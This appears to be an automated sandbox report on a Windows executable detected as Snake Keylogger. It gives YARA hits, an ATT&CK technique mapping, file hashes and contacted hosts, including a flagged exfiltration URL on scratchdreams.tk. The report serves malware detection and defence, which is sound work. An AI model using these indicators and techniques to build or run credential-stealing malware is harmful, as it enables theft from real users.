Source: Yara match	File source: 0.2.DNXS-04-22.exe.3359434.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DNXS-04-22.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
DNXS-04-22.exe	70%	Virustotal		Browse
DNXS-04-22.exe	100%	Avira	HEUR/AGEN.1352067
DNXS-04-22.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	2%	Virustotal	Browse
scratchdreams.tk	17%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/191.96.150.225	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources	0%	Avira URL Cloud	safe
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/191.96.150.225$	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	16%	Virustotal		Browse
http://scratchdreams.tk	17%	Virustotal		Browse
https://scratchdreams.tk	18%	Virustotal		Browse
http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	2%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	17%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.130.0	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/191.96.150.225	false	Avira URL Cloud: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/q	DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://reallyfreegeoip.org	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.org	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources	DNXS-04-22.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://scratchdreams.tk	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/191.96.150.225$	DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435145
Start date and time:	2024-05-02 07:59:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DNXS-04-22.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/0@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 181 Number of non-executed functions: 52
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:00:11	API Interceptor	7367567x Sleep call for process: DNXS-04-22.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.67.152	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
193.122.130.0	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
104.21.27.85	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
scratchdreams.tk	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.169.18
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
checkip.dyndns.com	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
reallyfreegeoip.org	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	104.21.25.202
	SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	Fizet#U00e9s,pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	104.20.3.235
	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	104.26.9.44
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	104.16.117.116
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.91.62
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.89.62
ORACLE-BMC-31898US	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	https://meet.servers.getgo.com/opener/e30.eyJpYXQiOjE3MTQ0OTcwOTYsImxhdW5jaFBhcmFtcyI6eyJidWlsZCI6IjE5OTUwIiwidGVsZW1ldHJ5VVJMIjoiaHR0cHM6Ly9sYXVuY2hzdGF0dXMuZ2V0Z28uY29tL2xhdW5jaGVyMi90ZWxlbWV0cnkvaGVscGVyP3Rva2VuPWcybS1yNGFnZXJmbmM4eGM1YnQwb2ZwY2poZC1iMTk5NTAtc2Nsc0pvaW5fYjBmZGI5NjFfNjM2OF80YTU2XzgwMTFfMmI0ZTlmYjEzNmRmIiwiZW5kcG9pbnRQYXJhbXMiOnsiUHJvZHVjdCI6ImcybSIsInNlc3Npb25UcmFja2luZ0lkIjoiY2xzSm9pbi1iMGZkYjk2MS02MzY4LTRhNTYtODAxMS0yYjRlOWZiMTM2ZGYiLCJsYXVuY2hVcmwiOiJtZWV0aW5nP3Nlc3Npb25UcmFja2luZ0lkPWNsc0pvaW4tYjBmZGI5NjEtNjM2OC00YTU2LTgwMTEtMmI0ZTlmYjEzNmRmJmNsaWVudEdlbmVyYXRpb249cm9sbGluZyIsImVudiI6ImxpdmUifX0sInZlcnNpb24iOiIxLjAiLCJmbG93VHlwZSI6ImpvaW4iLCJlbmRwb2ludEZsYXZvciI6eyJmbGF2b3IiOiJuZXV0cm9uIiwiZmxhdm9yRW5mb3JjZWQiOiJ0cnVlIn0sImlzRmxhdm9yRmluYWwiOnRydWV9.e30	Get hash	malicious	Unknown	Browse	150.136.248.95
	FiddlerSetup.5.0.20242.10753-latest.exe.7z	Get hash	malicious	PureLog Stealer, zgRAT	Browse	192.29.11.142
	0t102oBJAv.elf	Get hash	malicious	Mirai	Browse	150.136.104.140
	0Vjz9RSZxz.elf	Get hash	malicious	Mirai	Browse	130.61.43.131
	BnH5cceMGl.elf	Get hash	malicious	Mirai	Browse	193.122.239.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
CLOUDFLARENETUS	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	104.21.25.202
	SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	Fizet#U00e9s,pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	104.20.3.235
	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	104.26.9.44
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	104.16.117.116
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.91.62
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.89.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	104.21.67.152
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.21.67.152
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	Dekontu.lnk.lnk	Get hash	malicious	Unknown	Browse	104.21.27.85
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	Fizet#U00e9s,pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.85
	SOLICITUD DE PRESUPUESTO.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.27.85
	PURCHASE ORDER_31062248.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.27.85
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.21.27.85
	NOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.85
	https://portal.cpscompressors.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.21.27.85
	Iauncher.exe	Get hash	malicious	RedLine	Browse	104.21.27.85
	Iauncher.exe	Get hash	malicious	RedLine	Browse	104.21.27.85

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.341884719013765
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DNXS-04-22.exe
File size:	888'832 bytes
MD5:	64932c473d74fbdfdb706a094543cf37
SHA1:	f19b8960681b56cab45a9f14871108cf4d522251
SHA256:	8b9dedaa09d239667dd9cabe0c7efab61712868b32ebb3a50110df8980823ce9
SHA512:	1f662c50b378e5be0dc6faec894fb7266417b5ac2952583efdb6801f873bd5c52e3a6d8d001491ee668c1142456ef33d606f2be7be6749840ac819b70d0023dd
SSDEEP:	12288:y2iNzeWFm+1okFwe6N9LtinuoFZK4s5ehC3s5IrA6tN/uYiXdwsh:y1tRFm+1okFPOtT4OgC3s5IlNxi
TLSH:	28155DD1F1508D9AE96B05F2BD2BA53024E37E9D54A4810C569ABB1B76F3342209FF0F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K................0.................. ... ....@.. ....................................@................................

File Icon


Icon Hash:	aea4accc16a3d9be

Static PE Info

General

Entrypoint:	0x491f9a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x87074BFA [Mon Oct 14 22:26:02 2041 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 37h
xor eax, 00483839h
add byte ptr [edi], dh
xor eax, 46514B34h
inc ecx
inc ebp
inc edi
